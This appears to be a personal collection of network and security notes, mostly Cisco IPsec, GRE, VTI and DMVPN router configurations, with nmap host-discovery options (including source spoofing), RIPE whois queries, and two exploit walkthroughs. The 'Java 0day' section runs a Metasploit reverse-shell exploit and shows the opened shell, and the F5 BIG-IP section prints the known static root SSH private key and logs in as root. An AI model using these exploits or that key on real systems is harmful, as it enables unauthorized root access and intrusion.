# Dynamic and static VTI


Topology

[PC-1]----[ROUTER-1]----[ROUTER-2]----[PC-2]

[PC-1] eth0: 192.168.1.1/24

[ROUTER-1] fa0/1: 192.168.1.254/24
[ROUTER-1] fa0/0: 12.12.12.1/24
[ROUTER-1] vt1: 192.168.0.1/24 (virtual-template1)
[ROUTER-1] lo0: 192.168.0.1/24

[ROUTER-2] lo0: 192.168.0.2/24
[ROUTER-2] tu0: 192.168.0.2/24
[ROUTER-2] fa0/0: 12.12.12.2/24
[ROUTER-2) fa0/1: 192.168.2.254/24

[PC-2] eth0: 192.168.2.1/24

Dynamic VTI (Hub)

The hub cannot initiate a site-to-site VPN because it does not know the peer IP address.

ROUTER-1(config)# crypto isakmp policy 1
ROUTER-1(config-isakmp)# authentication pre-share
ROUTER-1(config-isakmp)# encryption aes
ROUTER-1(config-isakmp)# hash sha
ROUTER-1(config-isakmp)# group 2
ROUTER-1(config-isakmp)# lifetime 86400
ROUTER-1(config)# crypto isakmp aggressive-mode disable
ROUTER-1(config)# crypto keyring KEYRING
ROUTER-1(conf-keyring)# pre-shared-key address 0.0.0.0 0.0.0.0 key 0 SECRET_KEY
ROUTER-1(config)# crypto isakmp enable
ROUTER-1(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-1(config)# crypto isakmp profile PROFILE
ROUTER-1(conf-isa-prof)# match identity address 0.0.0.0 0.0.0.0
ROUTER-1(conf-isa-prof)# keyring KEYRING
ROUTER-1(conf-isa-prof)# virtual-template 1
ROUTER-1(config)# crypto ipsec profile PROFILE
ROUTER-1(config-profile)# set transform-set TRANSFORM_SET
ROUTER-1(config-profile)# set isakmp-profile PROFILE
ROUTER-1(config-profile)# set pfs group2
ROUTER-1(config)# interface lo0
ROUTER-1(config-if)# ip address 192.168.0.1 255.255.255.0
ROUTER-1(config)# interface fa0/0
ROUTER-1(config-if)# ip nat outside
ROUTER-1(config)# interface fa0/1
ROUTER-1(config-if)# ip nat inside
ROUTER-1(config)# interface virtual-template1 type tunnel
ROUTER-1(config-if)# ip unnumbered lo0
ROUTER-1(config-if)# tunnel source fa0/0
ROUTER-1(config-if)# tunnel mode ipsec ipv4
ROUTER-1(config-if)# tunnel protection ipsec profile PROFILE
ROUTER-1(config)# ip route 0.0.0.0 0.0.0.0 12.12.12.2
ROUTER-1(config)# ip access-list extended ACL_NAT
ROUTER-1(config-ext-nacl)# permit ip any any
ROUTER-1(config)# ip nat inside source list ACL_NAT interface fa0/0 overload
ROUTER-1(config)# router ospf 1
ROUTER-1(config-router)# network 192.168.0.0 0.0.255.255 area 0
ROUTER-1(config-router)# passive-interface default
ROUTER-1(config-router)# no passive-interface virtual-template1

Static VTI (Spoke)

The spokes initiate the site-to-site VPN.

ROUTER-2(config)# crypto isakmp policy 1
ROUTER-2(config-isakmp)# authentication pre-share
ROUTER-2(config-isakmp)# encryption aes
ROUTER-2(config-isakmp)# hash sha
ROUTER-2(config-isakmp)# group 2
ROUTER-2(config-isakmp)# lifetime 86400
ROUTER-2(config)# crypto isakmp aggressive-mode disable
ROUTER-2(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.1
ROUTER-2(config)# crypto isakmp enable
ROUTER-2(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-2(config)# crypto ipsec profile PROFILE
ROUTER-2(config-crypto-map)# set transform-set TRANSFORM_SET
ROUTER-2(config-crypto-map)# set pfs group2
ROUTER-2(config)# interface lo0
ROUTER-2(config-if)# ip address 192.168.0.2 255.255.255.0
ROUTER-2(config)# interface fa0/0
ROUTER-2(config-if)# ip nat outside
ROUTER-2(config)# interface fa0/1
ROUTER-2(config-if)# ip nat inside
ROUTER-2(config)# interface tu0
ROUTER-2(config-if)# ip unnumbered lo0
ROUTER-2(config-if)# tunnel source fa0/0
ROUTER-2(config-if)# tunnel destination 12.12.12.1
ROUTER-2(config-if)# tunnel mode ipsec ipv4
ROUTER-2(config-if)# tunnel protection ipsec profile PROFILE
ROUTER-2(config)# ip route 0.0.0.0 0.0.0.0 12.12.12.1
ROUTER-2(config)# ip access-list extended ACL_NAT
ROUTER-2(config-ext-nacl)# permit ip any any
ROUTER-2(config)# ip nat inside source list ACL_NAT interface fa0/0 overload
ROUTER-2(config)# router ospf 1
ROUTER-2(config-router)# network 192.168.0.0 0.0.255.255 area 0
ROUTER-2(config-router)# passive-interface default
ROUTER-2(config-router)# no passive-interface tu0

# GRE over IPsec


Topology

[PC-1]----[ROUTER-1]----[ROUTER-2]----[PC-2]

[PC-1] eth0: 192.168.1.1/24

[ROUTER-1] fa0/1: 192.168.1.254/24
[ROUTER-1] fa0/0: 12.12.12.1/24
[ROUTER-1] tu0: 12.0.0.1/24

[ROUTER-2] tu0: 12.0.0.2/24
[ROUTER-2] fa0/0: 12.12.12.2/24
[ROUTER-2) fa0/1: 192.168.2.254/24

[PC-2] eth0: 192.168.2.1/24

Using static crypto maps

ROUTER-1(config)# crypto isakmp policy 1
ROUTER-1(config-isakmp)# authentication pre-share
ROUTER-1(config-isakmp)# encryption aes
ROUTER-1(config-isakmp)# hash sha
ROUTER-1(config-isakmp)# group 2
ROUTER-1(config-isakmp)# lifetime 86400
ROUTER-1(config)# crypto isakmp aggressive-mode disable
ROUTER-1(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.2
ROUTER-1(config)# crypto isakmp enable
ROUTER-1(config)# ip access-list extended CRYPTO_ACL
ROUTER-1(config-ext-nacl)# permit gre host 12.12.12.1 host 12.12.12.2
ROUTER-1(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-1(config)# crypto map CRYPTO_MAP 1 ipsec-isakmp
ROUTER-1(config-crypto-map)# set peer 12.12.12.2
ROUTER-1(config-crypto-map)# match address CRYPTO_ACL
ROUTER-1(config-crypto-map)# set transform-set TRANSFORM_SET
ROUTER-1(config-crypto-map)# set pfs group2
ROUTER-1(config)# interface fa0/0
ROUTER-1(config-if)# crypto map CRYPTO_MAP
ROUTER-1(config-if)# ip nat outside
ROUTER-1(config)# interface fa0/1
ROUTER-1(config-if)# ip nat inside
ROUTER-1(config)# interface tu0
ROUTER-1(config-if)# ip address 12.0.0.1 255.255.255.0
ROUTER-1(config-if)# tunnel source fa0/0
ROUTER-1(config-if)# tunnel destination 12.12.12.2
ROUTER-1(config)# ip route 192.168.2.0 255.255.255.0 12.0.0.2
ROUTER-1(config)# ip route 0.0.0.0 0.0.0.0 12.12.12.2
ROUTER-1(config)# ip access-list extended ACL_NAT
ROUTER-1(config-ext-nacl)# permit ip any any
ROUTER-1(config)# ip nat inside source list ACL_NAT interface fa0/0 overload
ROUTER-2(config)# crypto isakmp policy 1
ROUTER-2(config-isakmp)# authentication pre-share
ROUTER-2(config-isakmp)# encryption aes
ROUTER-2(config-isakmp)# hash sha
ROUTER-2(config-isakmp)# group 2
ROUTER-2(config-isakmp)# lifetime 86400
ROUTER-2(config)# crypto isakmp aggressive-mode disable
ROUTER-2(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.1
ROUTER-2(config)# crypto isakmp enable
ROUTER-2(config)# ip access-list extended CRYPTO_ACL
ROUTER-2(config-ext-nacl)# permit gre host 12.12.12.2 host 12.12.12.1
ROUTER-2(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-2(config)# crypto map CRYPTO_MAP 1 ipsec-isakmp
ROUTER-2(config-crypto-map)# set peer 12.12.12.1
ROUTER-2(config-crypto-map)# match address CRYPTO_ACL
ROUTER-2(config-crypto-map)# set transform-set TRANSFORM_SET
ROUTER-2(config-crypto-map)# set pfs group2
ROUTER-2(config)# interface fa0/0
ROUTER-2(config-if)# crypto map CRYPTO_MAP
ROUTER-2(config-if)# ip nat outside
ROUTER-2(config)# interface fa0/1
ROUTER-2(config-if)# ip nat inside
ROUTER-2(config)# interface tu0
ROUTER-2(config-if)# ip address 12.0.0.2 255.255.255.0
ROUTER-2(config-if)# tunnel source fa0/0
ROUTER-2(config-if)# tunnel destination 12.12.12.1
ROUTER-2(config)# ip route 192.168.1.0 255.255.255.0 12.0.0.1
ROUTER-2(config)# ip route 0.0.0.0 0.0.0.0 12.12.12.1
ROUTER-2(config)# ip access-list extended ACL_NAT
ROUTER-2(config-ext-nacl)# permit ip any any
ROUTER-2(config)# ip nat inside source list ACL_NAT interface fa0/0 overload

Using profiles

ROUTER-1(config)# crypto isakmp policy 1
ROUTER-1(config-isakmp)# authentication pre-share
ROUTER-1(config-isakmp)# encryption aes
ROUTER-1(config-isakmp)# hash sha
ROUTER-1(config-isakmp)# group 2
ROUTER-1(config-isakmp)# lifetime 86400
ROUTER-1(config)# crypto isakmp aggressive-mode disable
ROUTER-1(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.2
ROUTER-1(config)# crypto isakmp enable
ROUTER-1(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-1(config)# crypto ipsec profile PROFILE
ROUTER-1(config-profile)# set transform-set TRANSFORM_SET
ROUTER-1(config-profile)# set pfs group2
ROUTER-1(config)# interface fa0/0
ROUTER-1(config-if)# ip nat outside
ROUTER-1(config)# interface fa0/1
ROUTER-1(config-if)# ip nat inside
ROUTER-1(config)# interface tu0
ROUTER-1(config-if)# ip address 12.0.0.1 255.255.255.0
ROUTER-1(config-if)# tunnel source fa0/0
ROUTER-1(config-if)# tunnel destination 12.12.12.2
ROUTER-1(config-if)# tunnel protection ipsec profile PROFILE
ROUTER-1(config)# ip route 192.168.2.0 255.255.255.0 12.0.0.2
ROUTER-1(config)# ip route 0.0.0.0 0.0.0.0 12.12.12.2
ROUTER-1(config)# ip access-list extended ACL_NAT
ROUTER-1(config-ext-nacl)# permit ip any any
ROUTER-1(config)# ip nat inside source list ACL_NAT interface fa0/0 overload
ROUTER-2(config)# crypto isakmp policy 1
ROUTER-2(config-isakmp)# authentication pre-share
ROUTER-2(config-isakmp)# encryption aes
ROUTER-2(config-isakmp)# hash sha
ROUTER-2(config-isakmp)# group 2
ROUTER-2(config-isakmp)# lifetime 86400
ROUTER-2(config)# crypto isakmp aggressive-mode disable
ROUTER-2(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.1
ROUTER-2(config)# crypto isakmp enable
ROUTER-2(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-2(config)# crypto ipsec profile PROFILE
ROUTER-2(config-crypto-map)# set transform-set TRANSFORM_SET
ROUTER-2(config-crypto-map)# set pfs group2
ROUTER-2(config)# interface fa0/0
ROUTER-2(config-if)# ip nat outside
ROUTER-2(config)# interface fa0/1
ROUTER-2(config-if)# ip nat inside
ROUTER-2(config)# interface tu0
ROUTER-2(config-if)# ip address 12.0.0.2 255.255.255.0
ROUTER-2(config-if)# tunnel source fa0/0
ROUTER-2(config-if)# tunnel destination 12.12.12.1
ROUTER-2(config-if)# tunnel protection ipsec profile PROFILE
ROUTER-2(config)# ip route 192.168.1.0 255.255.255.0 12.0.0.1
ROUTER-2(config)# ip route 0.0.0.0 0.0.0.0 12.12.12.1
ROUTER-2(config)# ip access-list extended ACL_NAT
ROUTER-2(config-ext-nacl)# permit ip any any
ROUTER-2(config)# ip nat inside source list ACL_NAT interface fa0/0 overload

# Dynamic and static crypto maps

Topology

[PC-1]----[ROUTER-1]----[ROUTER-2]----[PC-2]

[PC-1] eth0: 192.168.1.1/24

[ROUTER-1] fa0/1: 192.168.1.254/24
[ROUTER-1] fa0/0: 12.12.12.1/24

[ROUTER-2] fa0/0: 12.12.12.2/24
[ROUTER-2) fa0/1: 192.168.2.254/24

[PC-2] eth0: 192.168.2.1/24

Dynamic crypto map (Hub)

The hub cannot initiate a site-to-site VPN because it does not know the peer IP address.

ROUTER-1(config)# crypto isakmp policy 1
ROUTER-1(config-isakmp)# authentication pre-share
ROUTER-1(config-isakmp)# encryption aes
ROUTER-1(config-isakmp)# hash sha
ROUTER-1(config-isakmp)# group 2
ROUTER-1(config-isakmp)# lifetime 86400
ROUTER-1(config)# crypto isakmp aggressive-mode disable
ROUTER-1(config)# crypto isakmp key 0 SECRET_KEY address 0.0.0.0 0.0.0.0
ROUTER-1(config)# crypto isakmp enable
ROUTER-1(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-1(config)# crypto dynamic-map DYNAMIC-MAP 1
ROUTER-1(config-crypto-map)# set transform-set TRANSFORM_SET
ROUTER-1(config-crypto-map)# set pfs group2
ROUTER-1(config)# crypto map CRYPTO_MAP 1 ipsec-isakmp dynamic DYNAMIC-MAP
ROUTER-1(config)# interface fa0/0
ROUTER-1(config-if)# crypto map CRYPTO_MAP
ROUTER-1(config-if)# ip nat outside
ROUTER-1(config)# interface fa0/1
ROUTER-1(config-if)# ip nat inside
ROUTER-1(config)# ip route 0.0.0.0 0.0.0.0 12.12.12.2
ROUTER-1(config)# ip access-list extended ACL_NONAT
ROUTER-1(config-ext-nacl)# deny ip 192.168.1.0 0.0.0.255 192.168.0.0 0.0.255.255
ROUTER-1(config-ext-nacl)# permit ip any any
ROUTER-1(config)# ip nat inside source list ACL_NONAT interface fa0/0 overload

Static crypto map (Spoke)

The spokes initiate the site-to-site VPN.

ROUTER-2(config)# crypto isakmp policy 1
ROUTER-2(config-isakmp)# authentication pre-share
ROUTER-2(config-isakmp)# encryption aes
ROUTER-2(config-isakmp)# hash sha
ROUTER-2(config-isakmp)# group 2
ROUTER-2(config-isakmp)# lifetime 86400
ROUTER-2(config)# crypto isakmp aggressive-mode disable
ROUTER-2(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.1
ROUTER-2(config)# crypto isakmp enable
ROUTER-2(config)# ip access-list extended CRYPTO_ACL
ROUTER-2(config-ext-nacl)# permit ip 192.168.2.0 0.0.0.255 192.168.1.0 0.0.0.255
ROUTER-2(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-2(config)# crypto map CRYPTO_MAP 1 ipsec-isakmp
ROUTER-2(config-crypto-map)# set peer 12.12.12.1
ROUTER-2(config-crypto-map)# match address CRYPTO_ACL
ROUTER-2(config-crypto-map)# set transform-set TRANSFORM_SET
ROUTER-2(config-crypto-map)# set pfs group2
ROUTER-2(config)# interface fa0/0
ROUTER-2(config-if)# crypto map CRYPTO_MAP
ROUTER-2(config-if)# ip nat outside
ROUTER-2(config)# interface fa0/1
ROUTER-2(config-if)# ip nat inside
ROUTER-2(config)# ip route 192.168.1.0 255.255.255.0 12.12.12.1
ROUTER-2(config)# ip access-list extended ACL_NONAT
ROUTER-2(config-ext-nacl)# deny ip 192.168.2.0 0.0.0.255 192.168.1.0 0.0.0.255
ROUTER-2(config-ext-nacl)# permit ip any any
ROUTER-2(config)# ip nat inside source list ACL_NONAT interface fa0/0 overload

# Nmap Host Discovery

Source file

# cat ip_list.txt
1.1.1.0
1.1.1.1
1.1.1.2
1.1.1.3
1.1.1.4
1.1.1.5
1.1.1.6
1.1.1.7
1.1.1.8
1.1.1.9
# nmap -n -sL -iL ip_list.txt

Reverse DNS resolution

# cat /etc/resolv.conf
nameserver 8.8.8.8
# nmap --dns-servers 8.8.4.4 -sL 1.1.1.0/24

Only ping scan -sP

ICMP echo request -PE:

# nmap --dns-servers 8.8.4.4 -sP -PE 1.1.1.1

ICMP timestamp request -PP:

# nmap --dns-servers 8.8.4.4 -sP -PP 1.1.1.1

ICMP address mask request -PM:

# nmap --dns-servers 8.8.4.4 -sP -PM 1.1.1.1

TCP SYN ping -PS:

# nmap --dns-servers 8.8.4.4 -sP -PS80 1.1.1.1

TCP ACK ping -PA:

# nmap --dns-servers 8.8.4.4 -sP -PA80 1.1.1.1

UDP ping -PU:

# nmap --dns-servers 8.8.4.4 -sP -PU53 1.1.1.1

IP protocol ping -PO:

# nmap --dns-servers 8.8.4.4 -sP -POicmp,igmp 1.1.1.1

ARP scan -PR (local ethernet host):

# nmap --dns-servers 192.168.1.10 -sP -PR 192.168.1.1

Related options:

--verbose
--source-port _port_
-n disables DNS resolution
--data-length _length_ adds random bytes to every packet
--ttl _value_
-T3, -T4, -T5 speed up ping scanning
--max-parallelism _value_
--max-rtt-timeout _value_ how long nmap waits for a ping response
-oA, -oN, -oG, -oX different outputs
--packet-trace provides more detail
--D _decoy1_ adds some noise

Spoof your real source address -e _intf_ -S _spoofed-ip_:

# nmap --dns-servers 8.8.4.4 -sP -PS80 -e ppp0 -S 2.2.2.2 1.1.1.1

Skip discovery stage -PN and begin default scanning stage

No matter if the host is up and running:

# nmap -PN 1.1.1.1

# RIPE whois queries

Introduction

https://www.ripe.net/data-tools/support/documentation/queries-ref-card


Direct queries

# whois -B -h whois.ripe.net 217.148.69.0
# whois -B -h whois.ripe.net 217.148.69.0/24
# whois -B -h whois.ripe.net CAIXA
# whois -B -h whois.ripe.net EdJ9-RIPE
# whois -B -h whois.ripe.net edejuan@lacaixa.es
# whois -B -h whois.ripe.net LACAIXA-MNT
# whois -B -h whois.ripe.net AS16383

Inverse queries

# whois -B -h whois.ripe.net -i person EdJ9-RIPE
# whois -B -h whois.ripe.net -i notify edejuan@lacaixa.es
# whois -B -h whois.ripe.net -i mnt-by LACAIXA-MNT
# whois -B -h whois.ripe.net -i origin AS16383
# whois -B -h whois.ripe.net -i nserver ns1.lacaixa.com

Commonly used flags

# whois -B -h whois.ripe.net -r 217.148.69.0 ! Disables recursive search
# whois -B -h whois.ripe.net -L 217.148.69.0 ! All less specific objects

# Exploiting Java 0day

Introduction

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-4681

Metasploit

# msfconsole

msf > use exploit/multi/browser/java_jre17_exec
msf  exploit(java_jre17_exec) > set payload java/shell/reverse_tcp
msf  exploit(java_jre17_exec) > set srvhost 192.168.0.2
msf  exploit(java_jre17_exec) > set lhost 192.168.0.2
msf  exploit(java_jre17_exec) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.2:4444 
msf  exploit(java_jre17_exec) > [*] Using URL: http://192.168.0.2:8080/UxFhxobmVYzm
[*] Server started.
[*] 192.168.0.1      java_jre17_exec - Java 7 Applet Remote Code Execution handling request
[*] 192.168.0.1      java_jre17_exec - Sending Applet.jar
[*] 192.168.0.1      java_jre17_exec - Sending Applet.jar
[*] 192.168.0.1      java_jre17_exec - Sending Applet.jar
[*] Sending stage (2976 bytes) to 192.168.0.1
[*] Command shell session 1 opened (192.168.0.2:4444 -> 192.168.0.1:1139)

msf  exploit(java_jre17_exec) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\User\Desktop>

# Exploiting F5 BIG-IP SSH vulnerability

Introduction

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1493
http://support.f5.com/kb/en-us/solutions/public/13000/600/sol13600.html

Option 1: Command-line

# cat f5_private_key 
-----BEGIN RSA PRIVATE KEY-----
MIICWgIBAAKBgQC8iELmyRPPHIeJ//uLLfKHG4rr84HXeGM+quySiCRgWtxbw4rh
UlP7n4XHvB3ixAKdWfys2pqHD/Hqx9w4wMj9e+fjIpTi3xOdh/YylRWvid3Pf0vk
OzWftKLWbay5Q3FZsq/nwjz40yGW3YhOtpK5NTQ0bKZY5zz4s2L4wdd0uQIBIwKB
gBWL6mOEsc6G6uszMrDSDRbBUbSQ26OYuuKXMPrNuwOynNdJjDcCGDoDmkK2adDF
8auVQXLXJ5poOOeh0AZ8br2vnk3hZd9mnF+uyDB3PO/tqpXOrpzSyuITy5LJZBBv
7r7kqhyBs0vuSdL/D+i1DHYf0nv2Ps4aspoBVumuQid7AkEA+tD3RDashPmoQJvM
2oWS7PO6ljUVXszuhHdUOaFtx60ZOg0OVwnh+NBbbszGpsOwwEE+OqrKMTZjYg3s
37+x/wJBAMBtwmoi05hBsA4Cvac66T1Vdhie8qf5dwL2PdHfu6hbOifSX/xSPnVL
RTbwU9+h/t6BOYdWA0xr0cWcjy1U6UcCQQDBfKF9w8bqPO+CTE2SoY6ZiNHEVNX4
rLf/ycShfIfjLcMA5YAXQiNZisow5xznC/1hHGM0kmF2a8kCf8VcJio5AkBi9p5/
uiOtY5xe+hhkofRLbce05AfEGeVvPM9V/gi8+7eCMa209xjOm70yMnRHIBys8gBU
Ot0f/O+KM0JR0+WvAkAskPvTXevY5wkp5mYXMBlUqEd7R3vGBV/qp4BldW5l0N4G
LesWvIh6+moTbFuPRoQnGO2P6D7Q5sPPqgqyefZS
-----END RSA PRIVATE KEY-----
# chmod 0600 f5_private_key
# ssh -i f5_private_key root@192.168.1.1
[root@F5-BIG-IP:Active] config # bigpipe platform | grep Platform
|     BIOS revision: F5 Platform: C103 OBJ-0335-01 BIOS (build: 130) Date: 09/12/09
[root@F5-BIG-IP:Active] config # bigpipe version | grep Version
BIG-IP Version 10.2.2 969.0
[root@F5-BIG-IP:Active] config # whoami
root

Option 2: PuTTY

- Use PuTTYGen to obtain a private ppk file from f5_private_key
- Execute PuTTY
- Connection/SSH/Auth/Private key file for authentication/Browse...: C:\f5_private_key.ppk
- Session/Host Name (or IP address) and Port: 192.168.1.1:22
- Open

login as: root
Authenticating with public key "imported-openssh-key"
[root@F5-BIG-IP:Active] config # whoami
root

Option 3: Metasploit

# msfconsole

msf > use exploit/linux/ssh/f5_bigip_known_privkey
msf  exploit(f5_bigip_known_privkey) > show payloads
msf  exploit(f5_bigip_known_privkey) > set payload cmd/unix/interact
msf  exploit(f5_bigip_known_privkey) > set lhost 192.168.1.2
msf  exploit(f5_bigip_known_privkey) > set rhost 192.168.1.1
msf  exploit(f5_bigip_known_privkey) > exploit

[+] Successful login
[*] Found shell.
[*] Command shell session 1 opened (192.168.1.2:42298 -> 192.168.1.1:22)

whoami
root

# Dynamic Multipoint VPN (DMVPN)

Topology

[ROUTER-0]-----[ROUTER-1]
[ROUTER-0]-----[ROUTER-2]
[ROUTER-0]-----[ROUTER-3]

[ROUTER-1] is the NHRP server.
[ROUTER-2] and [ROUTER-3] are the NHRP clients.

[ROUTER-0] fa0/1: 192.168.1.254/24
[ROUTER-0] fa0/2: 192.168.2.254/24
[ROUTER-0] fa0/3: 192.168.3.254/24

[ROUTER-1] fa0/0: 192.168.1.1/24
[ROUTER-2] fa0/0: 192.168.2.2/24
[ROUTER-3] fa0/0: 192.168.3.3/24

ROUTER-1 configuration

Network

ROUTER-1(config)# interface FastEthernet0/0
ROUTER-1(config-if)# ip address 192.168.1.1 255.255.255.0
ROUTER-1(config)# ip route 0.0.0.0 0.0.0.0 192.168.1.254

Multipoint GRE (mGRE) and Next Hop Resolution Protocol (NHRP)

ROUTER-1(config)# interface Tunnel1
ROUTER-1(config-if)# ip address 1.2.3.1 255.255.255.0
ROUTER-1(config-if)# ip nhrp authentication NHRP_KEY
ROUTER-1(config-if)# ip nhrp map multicast dynamic
ROUTER-1(config-if)# ip nhrp network-id 123
ROUTER-1(config-if)# tunnel source FastEthernet0/0
ROUTER-1(config-if)# tunnel mode gre multipoint
ROUTER-1(config-if)# tunnel key 123

IPsec

ROUTER-1(config)# crypto isakmp policy 1
ROUTER-1(config-isakmp)# authentication pre-share
ROUTER-1(config-isakmp)# encryption aes
ROUTER-1(config-isakmp)# hash sha
ROUTER-1(config-isakmp)# group 2
ROUTER-1(config-isakmp)# lifetime 86400
ROUTER-1(config)# crypto isakmp aggressive-mode disable
ROUTER-1(config)# crypto isakmp key SECRET_KEY address 192.168.2.2
ROUTER-1(config)# crypto isakmp key SECRET_KEY address 192.168.3.3
ROUTER-1(config)# crypto isakmp enable
ROUTER-1(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-1(config)# crypto ipsec profile PROFILE
ROUTER-1(ipsec-profile)# set transform-set TRANSFORM_SET
ROUTER-1(ipsec-profile)# set pfs group2
ROUTER-1(config)# interface Tunnel1
ROUTER-1(config-if)# tunnel protection ipsec profile PROFILE

ROUTER-2 configuration

Network

ROUTER-2(config)# interface FastEthernet0/0
ROUTER-2(config-if)# ip address 192.168.2.2 255.255.255.0
ROUTER-2(config)# ip route 0.0.0.0 0.0.0.0 192.168.2.254

Multipoint GRE (mGRE) and Next Hop Resolution Protocol (NHRP)

ROUTER-2(config)# interface Tunnel2
ROUTER-2(config-if)# ip address 1.2.3.2 255.255.255.0
ROUTER-2(config-if)# ip nhrp authentication NHRP_KEY
ROUTER-2(config-if)# ip nhrp map 1.2.3.1 192.168.1.1
ROUTER-2(config-if)# ip nhrp network-id 123
ROUTER-2(config-if)# ip nhrp nhs 1.2.3.1
ROUTER-2(config-if)# tunnel source FastEthernet0/0
ROUTER-2(config-if)# tunnel mode gre multipoint
ROUTER-2(config-if)# tunnel key 123

IPsec

ROUTER-2(config)# crypto isakmp policy 1
ROUTER-2(config-isakmp)# authentication pre-share
ROUTER-2(config-isakmp)# encryption aes
ROUTER-2(config-isakmp)# hash sha
ROUTER-2(config-isakmp)# group 2
ROUTER-2(config-isakmp)# lifetime 86400
ROUTER-2(config)# crypto isakmp aggressive-mode disable
ROUTER-2(config)# crypto isakmp key SECRET_KEY address 192.168.1.1
ROUTER-2(config)# crypto isakmp enable
ROUTER-2(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-2(config)# crypto ipsec profile PROFILE
ROUTER-2(ipsec-profile)# set transform-set TRANSFORM_SET
ROUTER-2(ipsec-profile)# set pfs group2
ROUTER-2(config)# interface Tunnel2
ROUTER-2(config-if)# tunnel protection ipsec profile PROFILE

ROUTER-3 configuration

Network

ROUTER-3(config)# interface FastEthernet0/0
ROUTER-3(config-if)# ip address 192.168.3.3 255.255.255.0
ROUTER-3(config)# ip route 0.0.0.0 0.0.0.0 192.168.3.254

Multipoint GRE (mGRE) and Next Hop Resolution Protocol (NHRP)

ROUTER-3(config)# interface Tunnel3
ROUTER-3(config-if)# ip address 1.2.3.3 255.255.255.0
ROUTER-3(config-if)# ip nhrp authentication NHRP_KEY
ROUTER-3(config-if)# ip nhrp map 1.2.3.1 192.168.1.1
ROUTER-3(config-if)# ip nhrp network-id 123
ROUTER-3(config-if)# ip nhrp nhs 1.2.3.1
ROUTER-3(config-if)# tunnel source FastEthernet0/0
ROUTER-3(config-if)# tunnel mode gre multipoint
ROUTER-3(config-if)# tunnel key 123

IPsec

ROUTER-3(config)# crypto isakmp policy 1
ROUTER-3(config-isakmp)# authentication pre-share
ROUTER-3(config-isakmp)# encryption aes
ROUTER-3(config-isakmp)# hash sha
ROUTER-3(config-isakmp)# group 2
ROUTER-3(config-isakmp)# lifetime 86400
ROUTER-3(config)# crypto isakmp aggressive-mode disable
ROUTER-3(config)# crypto isakmp key SECRET_KEY address 192.168.1.1
ROUTER-3(config)# crypto isakmp enable
ROUTER-3(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-3(config)# crypto ipsec profile PROFILE
ROUTER-3(ipsec-profile)# set transform-set TRANSFORM_SET
ROUTER-3(ipsec-profile)# set pfs group2
ROUTER-3(config)# interface Tunnel3
ROUTER-3(config-if)# tunnel protection ipsec profile PROFILE

Troubleshooting commands

Router# show ip nhrp
Router# show dmvpn
Router# show crypto isakmp sa
Router# show crypto ipsec sa

# Site-to-site IPsec VPN configurations

Topology

[PC-1]----[VPN_DEVICE-1]----[VPN_DEVICE-2]----[PC-2]

[VPN_DEVICE-1] can be a Cisco ASA (ASA-1), a Cisco router (ROUTER-1) or an Openswan (LINUX-1).
[VPN_DEVICE-2] can be a Cisco ASA (ASA-2), a Cisco router (ROUTER-2) or an Openswan (LINUX-2).

[PC-1] eth0: 192.168.1.1/24

[VPN_DEVICE-1]
(ASA-1) e0/1, (ROUTER-1) fa0/1, (LINUX-1) fa0/1: 192.168.1.254/24
(ASA-1) e0/0, (ROUTER-1) fa0/0, (LINUX-1) fa0/0: 12.12.12.1/24

[VPN_DEVICE-2]
(ASA-2) e0/0, (ROUTER-2) fa0/0, (LINUX-2) fa0/0: 12.12.12.2/24
(ASA-2) e0/1, (ROUTER-2) fa0/1, (LINUX-2) fa0/1: 192.168.2.254/24

[PC-2] eth0: 192.168.2.1/24

Between two ASAs

ASA-1(config)# crypto ikev1 policy 1 ! crypto isakmp
ASA-1(config-ikev1-policy)# authentication pre-share
ASA-1(config-ikev1-policy)# encryption aes
ASA-1(config-ikev1-policy)# hash sha
ASA-1(config-ikev1-policy)# group 2
ASA-1(config-ikev1-policy)# lifetime 86400
ASA-1(config)# crypto ikev1 am-disable
ASA-1(config)# crypto ikev1 enable outside ! crypto isakmp
ASA-1(config)# tunnel-group 12.12.12.2 type ipsec-l2l
ASA-1(config)# tunnel-group 12.12.12.2 ipsec-attributes
ASA-1(config-tunnel-ipsec)# pre-shared-key SECRET_KEY
ASA-1(config)# access-list CRYPTO_ACL permit ip 192.168.1.0 255.255.255.0 192.168.2.0 255.255.255.0
ASA-1(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ASA-1(config)# crypto map CRYPTO_MAP 1 set peer 12.12.12.2
ASA-1(config)# crypto map CRYPTO_MAP 1 match address CRYPTO_ACL
ASA-1(config)# crypto map CRYPTO_MAP 1 set transform-set TRANSFORM_SET
ASA-1(config)# crypto map CRYPTO_MAP 1 set pfs group2
ASA-1(config)# crypto map CRYPTO_MAP interface outside
ASA-1(config)# route outside 192.168.2.0 255.255.255.0 12.12.12.2
ASA-1(config)# object network INSIDE_NET
ASA-1(config-network-object)# subnet 192.168.1.0 255.255.255.0
ASA-1(config)# object network OUTSIDE_NET
ASA-1(config-network-object)# subnet 192.168.2.0 255.255.255.0
ASA-1(config)# nat (inside,outside) source static INSIDE_NET INSIDE_NET
